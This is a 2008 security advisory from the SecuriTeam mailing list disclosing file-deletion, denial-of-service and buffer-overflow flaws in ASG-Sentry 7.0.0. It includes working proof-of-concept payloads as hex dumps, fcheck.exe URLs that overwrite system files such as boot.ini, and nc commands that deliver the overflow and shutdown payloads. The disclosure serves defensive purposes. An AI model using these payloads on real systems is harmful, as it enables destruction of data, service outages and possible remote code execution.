[NEWS] ASG-Sentry Multiple Vulnerabilities
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 12 Mar 2008 09:58:17 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ASG-Sentry Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
"The <http://www.asg-sentry.com> ASG-Sentry family of products is a suite
of tools strategically engineered to control, monitor, manage, and enhance
your network. Sentry's tools provide you with full visibility to your
network from any Web browser. Sentry also allows you to fully instrument
your company's applications, CPUs, disk space, memory, files, Windows and
UNIX platforms, and more." Multiple vulnerabilities have been discovered
in ASG-Sentry, these vulnerabilities allow remote attackers to cause the
product to delete arbitrary files, cause the product to crash and overflow
an internal buffer allowing the execution of arbitrary code.
DETAILS
Vulnerable Systems:
* ASG-Sentry version 7.0.0
Arbitrary files deletion
The fcheck.exe (File Check Utility) CGI available in ASG is used for
handling some index files which contain a list of filenames and checksums.
The -b option of this utility allows the creation of these index files and
is possible to specify both the name of the output file and, optionally,
the folder which will be scanned recursively for finding and reading the
various files to add to the list.
The first vulnerability is in the possibility for an external attacker to
use this CGI for overwriting existent files with no data (specifying a new
folder which will be created by the same program) or with the list of
filenames described before.
Naturally is possible to specify both files on the local disks or on
network shares.
The second effect instead is the possibility of occupying CPU and disk for
the scanning of any file in the disk simply specyfing, for example, c:\ as
folder.
Heap-overflow in FxAgent
The FxAgent process running on UDP port 6161 is used for handling the
various SNMP requests. A community field longer than 64 bytes can be used
by an attacker to exploit a heap-overflow.
Termination of FxIAList
FxIAList is a service which runs on the TCP port 6162 and is used for the
logging operations which include the commands "exit", "trace on"
"verbose", "trace off" and the name of the log file to create (xxxx.xx.xx)
and its content. The main problem is that the server doesn't require
authentication so anyone can send the "exit" command and the service will
just terminate.
Buffer overflow in FxIAList
The same service described before is affected also by a stack based
buffer-overflow which happens during the copying of the data we want to
write to the log file (max 1023 bytes) in a buffer of only 500.
Exploits:
asgulo_fxagent.txt:
0000000 2330 0102 0400 41ff 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
0000100 4141 4141 4141 16a1 0102 0236 0001 0102
0000110 3000 300b 0609 2b05 0106 0102 0005
000011e
asgulo-ialist1.txt:
0000000 7865 7469
0000004
asgulo-ialist2.txt:
0000000 3231 3433 3635 3837 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
00003f0 4141 4141 4141 4141 4141 4141 7c41 007c
00003ff
Arbitrary files deletion
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\windows\win.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\file.txt+c:\
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+\host\document.txt
this link for the network share is correct because Apache converts any
backslash to double so that one becomes \\host\\document.txt
Heap-overflow in FxAgent
nc SERVER 6161 -v -v -u < asgulo_fxagent.txt
Termination of FxIAList
nc SERVER 6162 -v -v -w 1 < asgulo-ialist1.txt
Buffer overflow in FxIAList
nc SERVER 6162 -v -v -w 1 < asgulo-ialist2.txt
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/asgulo-adv.txt>
http://aluigi.altervista.org/adv/asgulo-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [EXPL] MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow
- Next by Date: [EXPL] Timbuktu Pro Arbitrary File Deletion/Creation (Exploit)
- Previous by thread: [EXPL] MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow
- Next by thread: [EXPL] Timbuktu Pro Arbitrary File Deletion/Creation (Exploit)
- Index(es):
Relevant Pages
|
